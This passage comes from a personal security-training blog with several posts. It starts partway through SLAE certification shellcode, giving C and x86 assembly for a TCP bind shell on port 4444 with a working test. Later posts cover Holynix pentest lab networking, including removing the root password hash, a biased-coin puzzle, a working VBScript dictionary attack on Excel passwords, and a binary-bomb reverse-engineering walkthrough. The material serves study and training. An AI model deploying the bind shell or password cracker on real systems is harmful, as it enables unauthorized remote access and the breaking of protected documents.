    connfd = accept(listenfd, (struct sockaddr*) NULL, NULL);
    printf("Created accept socket: %d\n", connfd);

    // Duplicate stdin, stdout, stderr
    ret = dup2(connfd, 0);
    if (-1 == ret) {
        printf("STDIN duplication failed: %s\n", strerror(errno));
        return 1;
    }

    ret = dup2(connfd, 1);
    if (-1 == ret) {
        printf("STDOUT duplication failed: %s\n", strerror(errno));
        return 1;
    }

    ret = dup2(connfd, 2);
    if (-1 == ret) {
        printf("STDERR duplication failed: %s\n", strerror(errno));
        return 1;
    }

    // Replace process image
    char *args[2];
    args[0] = "/bin/sh";
    args[1] = NULL;      // Needs to ne a NULL terminated list of args

    ret = execve(args[0], args, NULL);
    if (-1 == ret) {
        printf("Execve failed: %s\n", strerror(errno));
        return 1;
    }

    return 0;
}

We can test and see we get a shell:

$ gcc -Wall shell_bind_tcp.c -o shell_bind_tcp
$ ./shell_bind_tcp  &
[1] 4528
$ nc -nvv 127.0.0.1 4444
Connection to 127.0.0.1 4444 port [tcp/*] succeeded!
Created accept socket: 4
whoami
liv

We can then analyse the system calls necessary to bind the socket, listen for connections and execute the shell:

$ strace ./shell_bind_tcp 
...
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 1)                            = 0
accept(3, 0, NULL)                      = 4
dup2(4, 0)                              = 0
dup2(4, 1)                              = 1
dup2(4, 2)                              = 2
execve("/bin/sh", ["/bin/sh"], [/* 0 vars */]) = 0

The next step is to reproduce these system calls in assembly and get the shellcode:

; SLAE - Assignment 1
;
; Shell Bind TCP
;

global _start   

section .text
_start:

    ; Linux Syscall Reference
    ; http://syscalls.kernelgrok.com/


    ; 1. socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = listenfd
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    push ecx        ; NULL terminate args list
    mov cl, 6       ; IPPROTO_TCP (6)
    push ecx
    xor ecx, ecx
    mov cl, 1       ; SOCK_STREAM (1) - in socket.h
    push ecx
    xor ecx, ecx
    mov cl, 2       ; PF_INET (2) - IP PROTO FAMILY
    push ecx
    mov ecx, esp    ; socketcall arguments
    xor ebx, ebx
    mov bl, 1       ; socketcall type of call: SYS_SOCKET (1) 
    push 102
    pop eax         ; socketcall syscall
    int 0x80
    mov edx, eax    ; listenfd is returned in eax. Save into edx    

    ; 2. bind(listenfd, {sa_family=AF_INET, sin_port=htons(4444), \
    ;       sin_addr=inet_addr("0.0.0.0")}, 16)
    ;struct sockaddr_in {
    ;    short            sin_family;   // e.g. AF_INET, AF_INET6
    ;    unsigned short   sin_port;     // e.g. htons(3490)
    ;    struct in_addr   sin_addr;     // see struct in_addr, below
    ;    char             sin_zero[8];  // zero this if you want to
    ;};
    ;struct in_addr {
    ;    unsigned long s_addr;          // load with inet_pton()
    ;};
    xor ecx, ecx    ; Construct sockaddr structure on the stack
    push ecx        ; inet_addr - 0.0.0.0 - INADDR_ANY
    push word <PORT>; 16 bits - port number
    push word 2     ; family - AF_INET (2)
    mov ecx, esp    ; pointer to args

    push byte 0x10  ; Address length - 16 bytes
    push ecx        ; Pointer to sockaddr_in structure
    push edx        ; listenfd from socket call

    mov ecx, esp    ; socketcall arguments
    xor ebx, ebx
    mov bl, 2       ; socketcall type of call: SYS_BIND (2)
    xor eax, eax
    mov al, 102     ; socketcall syscall
    int 0x80

    ; 3. listen(listenfd, 1)
    push 1          ; max connections
    push edx        ; listenfd
    mov ecx, esp    ; pointer to socketcall arguments
    push 4
    pop ebx         ; SYS_LISTEN (4)
    push 102
    pop eax         ; socketcall syscall
    int 0x80
 
    ; 4. accept(listenfd, 0, NULL) = connfd
    xor ecx, ecx
    push ecx        ; NULL
    push ecx        ; 0
    push edx        ; listenfd
    mov ecx, esp    ; pointer to socketcall arguments
    push 5
    pop ebx         ; SYS_ACCEPT = 5
    push 102
    pop eax         ; socketcall syscall
    int 0x80        ; connfd will be in eax
    mov edx, eax    ; save new connection descriptor

    ; 5. dup2(connfd, 2), dup2(connfd, 1), dup2(connfd, 0)
    push 2
    pop ecx         ; ecx - newfd
    mov ebx, edx    ; edx - connfd, ebx - oldfd
    dup_loop:
    mov al, 63      ; dup2 syscall
    int 0x80
    dec ecx
    jns dup_loop    ; exit when signed (-1)
      
    ; 6. execve("/bin/sh", ["/bin/sh"], [/* 0 vars */])
 ; PUSH the first null dword 
 xor eax, eax
 push eax

    ; PUSH //bin/sh (8 bytes) 
 push 0x68732f2f ; 'hs//'
 push 0x6e69622f ; 'nib/
 mov ebx, esp    ; EBX - 1st param - NULL terminated filename

 push eax        ; EDX - 3rd param - NULL terminated list of env variables
 mov edx, esp    ; NULL terminator must be set before setting the 2nd param!

 push ebx        ; ECX - 2nd param - array of argument strings
 mov ecx, esp

 mov al, 11      ; execve syscall
 int 0x80

To make the port number easily configurable, I've made a bash wrapper, which replaces PORT with a command line argument and then assembles and links the asm source

The complete source files, wrapper script and test shellcode can be found in a git repository at:
SLAE

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE- 449

Friday, May 17, 2013

Troubleshooting network connectivity for Holynix on VirtualBox

Holynix is a "Linux vmware image that was deliberately built to have security holes for the purposes of penetration testing". It has 2 levels and solutions are already published. In this post I'll details my approach to set up network connectivity for the 2 Holynix VMs and another Backtrack VM, all running in VirtualBox.
After some unsuccessful attempts to make it run under VirtualBox and have connectivity, I decided to reset the root password and actually check and understand the network settings.

To reset the root password

I've first install VmWare Player on Ubuntu.

The open VM in VMWare player

         - Edit Virtual Machine Settings
         - Go to Hard Disk
         - Utilities (at the bottom)
         - Mount Disk and select the second ext partition

Make a copy of the /etc/shadow file
Delete the password hash of root from /etc/shadow
Start again the VM in VirtualBox and login as root without password!

Holynix Level 1

To have connectivity between this machine and the bt machine, I just added an internal network adapter and put Holynix VM in the same lan as bt machine
Then got an IP through DHCP server of the internal network (already configured!)
# dhclient eth1
(or just apply the steps in next session to have eth0 instead eth1 and get IP automatically on eth0)

Holynix Level 2

First I've also removed root password.

Then for the network settings

Add holynix2 and bt to a new internal network
Holynix2 assigns static IP 192.168.1.88 on interface eth0 ! (Firewall rules seen when booting show eth0 also)
The /etc/network/interfaces file contains the following:

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
    address 192.168.1.88
    netmask 255.255.255.0
    network 192.168.1.0
    broadcast 192.168.1.255
    gateway 192.168.1.1

But we just have eth1, not eth0 ?!
If we examine the kernel messages we see:
# dmesg | grep eth
...
udev: renamed network interface eth0 to eth1
..

The explanation for this is found on virtualbox forums:
[SOLVED]Missing eth0 in Ubuntu guest

Basically the problem is that each time a VBox guest has a new/different MAC, Debian and Ubuntu guests udev assigns a new eth number. By deleting that file, it is recreated correctly at the next reboot).

# cd /etc/udev/rules.d
# sudo mv 70-persistent-net.rules 70-persistent-net.rules_old
# sudo reboot

After the reboot, eth0 will be present and configured properly.

For the Bbacktrack machine, we'll configure the interface that's in the same internal network as Holynix 2 VM:
# ifconfig eth4 down
# ifconfig eth4 192.168.1.1 netmask 255.255.255.0
# ifconfig eth4 up

Now check that we have connectivity between bt and holynix machines and happy hacking !

Monday, April 1, 2013

Fair result with biased coin

This is a nice short question: How can you get fair results from tossing a biased coin ? (but not completely biased though, with a side having 0 probability!). The solution given by von Neumann is as follows:

Toss the coin twice.
If the results match, start over, forgetting both results.
If the results differ, use the first result, forgetting the second.

This produces the correct result because even with this biased coin, the probability of heads then tails is equal to the probability of getting tails then heads. So out of the 4 possible events (H-T, H-H, T-H, T-T) we are left with 2 events with the same probability.

I made a small python script to see how many tries are needed as the probability of the biased faces varies away from 0.5

# Biased coin probability to get heads
p = 0.7

# Simulate the bias
N = 1000000
random.seed()
v = [0] * int(N * p) + [1] * int(N * (1-p))
random.shuffle(v)

# Fair events
cnt = 0
# Total events
ev = 0
 
while cnt<200: 
    idx1 = random.randint(0, N-1)
    idx2 = random.randint(0, N-1)
    
    if(v[idx1] != v[idx2]): 
        cnt +=1 
    ev += 1
    
# For p = 0.5 ev ~= cnt*2     
print "Events needed to get X fair tosses: %d" % (ev)

References
Fair results from a biased coin

Saturday, March 2, 2013

Dictionary attack on Excel passwords

When thinking about the security of encrypted Excel documents, I found a great article analyzing security of encryption algorithms for Excel spreadsheets [1]. The bottom line is that:

Encryption in Excel 2007 IS secure only for ".docx". For ".doc" it's NOT secure with default settings
Encryption in Excel 2002 and 2003 IS secure, but NOT when used with default settings!
Encryption in Excel 95, 97 and 2000 is NOT secure at all.

Instructions on how to make sure you're using the most secure algorithms and how to change the default settings in the referenced link.

How to set/change password to open and password to modify
Changing/removing the password to open a file is pretty straight-forward in Excel 2007-2010: from the File menu, chose Info, then Encrypt with password.

Changing the password to modify I found is not so straight-forward. To set/remove a "read-only" password, from the Save or Save As dialog boxes, select General Options from the Tools drop-down menu to open the General Options dialog box. There, in the Password to modify box, you can enter the new password or blank to remove the current one.

Dictionary attack

If the password is a dictionary word, then it's pretty easy to find it. I've made a small vbs script to attack these 2 passwords (password to open and password to modify) using words from a dictionary file. This could also be extended to something like the rules in jtr to intelligently guess/brute-force more passwords, based on tendencies (e.g. KoreLogic John rules [3]).
It's just a proof of concept, and it's very slow, it could be extended to use more threads or optimized.

' *****************************************************************
' Dictionary attack on Excel passwords
'
' Uses Workbooks.open method and a password dictionary to test:
' 1) password to open 
' 2) password for write access, using open password
'
' Usage: "CScript excel-pw-attack.vbs  "
'
' Full Description:
' http://insecure.tk/......
' *****************************************************************
Option Explicit
On Error Resume Next

Dim objExcel
Set objExcel = WScript.CreateObject("Excel.Application")
objExcel.visible=False

Dim args
if WScript.Arguments.Count < 2 or WScript.Arguments.Count > 3 then
   WScript.Echo "Usage: "
   WScript.Echo "Search password for open: "
   WScript.Echo "   CScript " & WScript.ScriptName & "  "
   WScript.Echo "Search password for modify, using password to open: "
   WScript.Echo "   CScript " & WScript.ScriptName & "   "
   WScript.Quit 1
end if

' Excel file should be in the script's directory
Dim xlsFile, currentPath
currentPath = replace(WScript.ScriptFullName, WScript.ScriptName, "")
xlsFile = currentPath & WScript.Arguments(0)
WScript.Echo "Brute-forcing excel file: " & xlsFile
WScript.Echo "Using dictionary file: " & WScript.Arguments(1)
if WScript.Arguments.Count = 3 then
 WScript.Echo "Using open password " & WScript.Arguments(2) & " to get the write password"
end if

' Read the passwords from the dictionary file
Dim objFSO
Set objFSO = CreateObject("Scripting.FileSystemObject")

Dim objFile
Const ForReading = 1
Set objFile = objFSO.OpenTextFile(currentPath & WScript.Arguments(1), ForReading)

Dim currLine, bFound
bFound = False
While Not bFound And Not objFile.AtEndOfStream
 currLine = objFile.ReadLine
 WScript.Echo "[*] Testing solution " & currLine
 if WScript.Arguments.Count = 3 then
  objExcel.Workbooks.Open xlsFile, , , , WScript.Arguments(2), currLine
 else
  ' Try to open it in read-only mode
  objExcel.Workbooks.Open xlsFile, ,True , , currLine
 end if
 if Err.Number >  0 then
  'WScript.Echo Err.Description & Err.Number
  Err.Clear
 else
  bFound = True
  if WScript.Arguments.Count = 3 then
   WScript.Echo "[+] Found password for modifying: " & currLine
  else
   WScript.Echo "[+] Found password for opening: " & currLine
  end if
 end If
Wend

if not bFound then
 if WScript.Arguments.Count = 3 then
  WScript.Echo "[-] Not found password for modifying."
 else
  WScript.Echo "[-] Not found password for opening."
 end if
end if


objExcel.Workbooks.Close
objFile.close

An example of how to use it on a test document with these 2 passwords set:

1. Find password to open:

>cscript excel-pw-attack.vbs test.xls words_en.txt
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

Brute-forcing excel file: C:\...\test.xls
Using dictionary file: words_en.txt
[+] Found password for opening: rock

2. Find password to modify:

>cscript excel-pw-attack.vbs test.xls words_en.txt rock
Microsoft (R) Windows Script Host Version 5.8
Copyright (C) Microsoft Corporation. All rights reserved.

Brute-forcing excel file: C:\...\test.xls
Using dictionary file: words_en.txt
Using open password rock to get the write password
[+] Found password for modifying: paper

References

[1] How safe is Excel encryption?
[2] Excel 2007 Encryption Strength
[3] KoreLogic custom password rules for John
[4] excel-pw-crack.vbs

Wednesday, February 6, 2013

Defusing a (binary) bomb

This very good x86 assembly training has a nice final exercise which is a job to defuse a binary bomb - an executable, without source code, with more phases, each one needing a password.
I understand that there are many variants of this bomb, so my answer won't fit every bomb, but anyway it's a spoiler, be aware!
Each level introduces also a programming construction (simple string manipulations, array, functions, cases, linked lists, trees...) so it's very interesting to actually do them and understand them.
The long version of the solutions is at this project. The short version below.
I've created a file with commands for easy debugging, and started the bomb like this:

$ gdb -q -x commands bomb
(gdb) run bomb-answers.txt

Phase 1
Here there's a simple string comparison in place
The two strings are compared:
- first one is our input string for the first phase:

(gdb) x /x $ebp+0x8
0xbffff440: 0x0804b680
(gdb) x /s 0x0804b680
0x804b680 &lt;input_strings>: "test"

- and second one is the password for phase_1:

(gdb) x/s 0x80497c0
0x80497c0:    "Public speaking is very easy."

Phase 2
Now 6 numbers are read from into an array, and an algorithm is applied as follows:

v[0] = 1
v[i] = (i+i) * v[i-1]

So we find the solution of phase 2:
1 2 6 24 120 720

Phase 3
This expects as input a number, a character and another number:

   0x08048bb1 &lt;+25>: push   0x80497de --> the format string for sscanf, "%d %c %d"
   0x08048bb6 &lt;+30>: push   edx
   0x08048bb7 &lt;+31>: call   0x8048860 &lt;sscanf@plt>

The rest of the disassembled instructions are a case structure, which checks the letter and the second number based on the first value

Phase 4
This phase is more interesting. It introduces a recursive function, which in the end turns out to be a much known one. A-Ha!
Func4 is as follows:

func4(x):
 if x &lt;= 1 :
  return 1;
 else :
  y = func4(x-1);
  z = func4(x-2);
  return y + z;

Phase 5
In this phase, the input password string is parsed character by character, and each parsed character gives an index into an input string. This way, final password has to be constructed.

We have to form the password 'giants' from the source string "isrveawhobpnutfg".

phase_5 function should be something like:

phase_5(s) {
 src = "isrveawhobpnutfg";
 dest = "12345";
 
 for (i=0; i&lt;=5; ++i) {
  idx = s[i] && 0xf; // cuts the most significant hex digit
  dest[i] = src[idx];
 }
}

Phase 6
This was the most difficult to figure out from the assembly code, as it's split into more stages, and involves linked lists structures. Complete details are in the link from beginning.
6 numbers are read. There is a predefined linked list also. Another important variable used is an array containing addresses of list elements.
- stage1: check that all 6 numbers read are between [1,..,6] and all different
- stage2: builds and arranges a second array with pointers to list elements
- stage3: fixes the links between elements from the input list to match the array constructed in stage2
- stage4: checks that the elements of the linked list are in reverse sorted order.

The second stage is the most important: we have to arrange the values of the list elements, so that we can pass stage 4 check (should be in reverse order).
Current order :

func4(x):
(gdb) printf "%08x %08x %08x %08x %08x %08x \n", *0x0804b26c, *0x0804b260, *0x0804b254, *0x0804b248, *0x0804b23c, *0x0804b230
000000fd 000002d5 0000012d 000003e5 000000d4 000001b0

The pseudo-code for this step could be something like:

   // 2nd stage
 i = 0
 ecx = v[0]
 eax = v2
 y = v2
 while i&lt;=5 : 
  elem = list_head
  elem = head
  j = 1
  edx = i
  if ( j &lt; v[i] ):
   do {
    elem = elem.next
    j ++
   }while (j &lt; v[i])
  v2[i] = elem
  i++

This stage builds a list of pointers to elements, which is used in stage 3 and 4.
Using the previously deduced agorithm, the input numbers (0
which mean how much we move an element, to have them in reverse order, should be:
pos 1: 3 (head->next->next->next which is the biggest num)
pos 2: 1 (head->next, which is the second biggest )
. . . and so on.

Because of the advancing algorithm, we add 1 to the previous, and get the solution: 4 2 6 3 1 5

Secret Phase

In the phase_difused function, we have another function called secret_phase, activated only after first stages are difused:

0x08049533 &lt;+7>: cmp    DWORD PTR ds:0x804b480,0x6    
0x0804953a &lt;+14>: jne    0x804959f &lt;phase_defused+115>

The passphrase from phase 4 is parsed again, now looking for a string. As we see below, we can get that string and advance:

0x08049544 <+24>: push   0x8049d03   --> "%d %s"    
0x08049549 <+29>: push   0x804b770   --> "9"  this is the input from phase_4    
0x0804954e <+34>: call   0x8048860 <sscanf@plt>    
0x08049553 <+39>: add    esp,0x10    
0x08049556 <+42>: cmp    eax,0x2    
0x08049559 <+45>: jne    0x8049592 <phase_defused+102>    
0x0804955b <+47>: add    esp,0xfffffff8    
0x0804955e <+50>: push   0x8049d09  --> "austinpowers"
0x08049563 <+55>: push   ebx    
0x08049564 <+56>: call   0x8049030 <strings_not_equal>

We add the password "austinpowers" and get the following 2 messages printed:
Curses, you've found the secret phase!
But finding it and solving it are quite different...
The secret_phase function calls another function, fun7 (very fun:) with an address and our input as a second parameter.

After digging int othe disassebly, the last fun7 is something like this:

int fun7(int *adr, int x) {
  if(adr == NULL) {
  ret = -1;  // 0xffffffff   
  goto exit;  
 }  
 if (x >= *adr) {
  if (x == *adr) {
   ret = 0   
  } else {
   ret = fun7(*(adr+8), x)
    ret *= 2;
    ret ++;
  }  
 } else {
  ret = fun7(*(adr+4), x)
   ret *= 2
 }  
exit:   
 return ret; 
}

Initial address passed to the function is 0x804b320. At this address there is a tree with 4 levels, as below. We navigate to the left or right branch depending on the input value. If input x is equal to value in branch, we return 0.
0x24
0x8 0x32
0x6 0x16 0x2d 0x6b
................................. 0x3e9
We want fun7() to return 7.

7 = 2*3+1 = 2*(2*1+1)+1.
According to the tree and deduced algorothm, we have:
f(0x24) = 0
f(0x32) = 2*f(0x24)+1 = 1
f(0x6b) = 2*f(0x32)+1 = 3
f(0x3e9) = 2*f(0x6b)+1 = 7

0x3e9 is 1001 decimal, and is accepted by the first check (param-1 <= 1000).

End
# ./bomb bomb-answers.txt

Welcome to my fiendish little bomb. You have 6 phases with which to blow yourself up. Have a nice day!
Phase 1 defused. How about the next one?
That's number 2. Keep going!
Halfway there!
So you got that one. Try this one.
Good work! On to the next...
Curses, you've found the secret phase!
But finding it and solving it are quite different...
Wow! You've defused the secret stage!
Congratulations! You've defused the bomb!
Thanks to the guys at Open Security Trainings for the interesting materials there!

Pages